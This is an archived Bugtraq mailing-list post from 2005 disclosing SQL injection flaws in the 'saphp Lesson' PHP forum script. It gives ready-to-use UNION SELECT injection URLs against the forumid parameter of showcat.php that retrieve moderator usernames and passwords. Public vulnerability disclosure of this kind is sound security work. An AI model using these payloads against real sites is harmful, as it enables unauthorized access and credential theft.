SQL saphp Lesson

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: SQL saphp Lesson
From: almaster@xxxxxxxxxxx
Date: 24 Oct 2005 15:52:29 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

saphp Lesson ..
Search By Google :-
saphp Lesson

Gr33tz :-
aLMaSTeR HaCKeR .. SQL Injection's FOunder - | almaster (at) hotmail (dot) com 
[email concealed]|-
Devil-00 .. SQL Injection's Exploting - | devil-00@xxxxxx | -
Security4Arab .. A'Where Home ..

1- SQL Injection in showcat.php
http://www.site.com/dros/showcat.php?forumid=|almaster

2-SQL Injection in add.php
http://www.site.com/dros/add.php?forumid=|almaster

Exp:
- Get Username By This Injection :

dros/showcat.php?forumid=-1%20UNION%20SELECT%20ModName%20FROM%20modretor

2- Get Password By This Injection :

dros/showcat.php?forumid=-1%20UNION%20SELECT%20ModPassword%20FROM%20modretor

aLMaSTeR [at] hotmail [dot] com

Prev by Date: [KAPDA::#8] Domain Manager Pro Vulnerability
Next by Date: Zomplog Script Injection Vulnerability =>3.4 (all versions vulnerable)
Previous by thread: [KAPDA::#8] Domain Manager Pro Vulnerability
Next by thread: Zomplog Script Injection Vulnerability =>3.4 (all versions vulnerable)
Index(es):
- Date
- Thread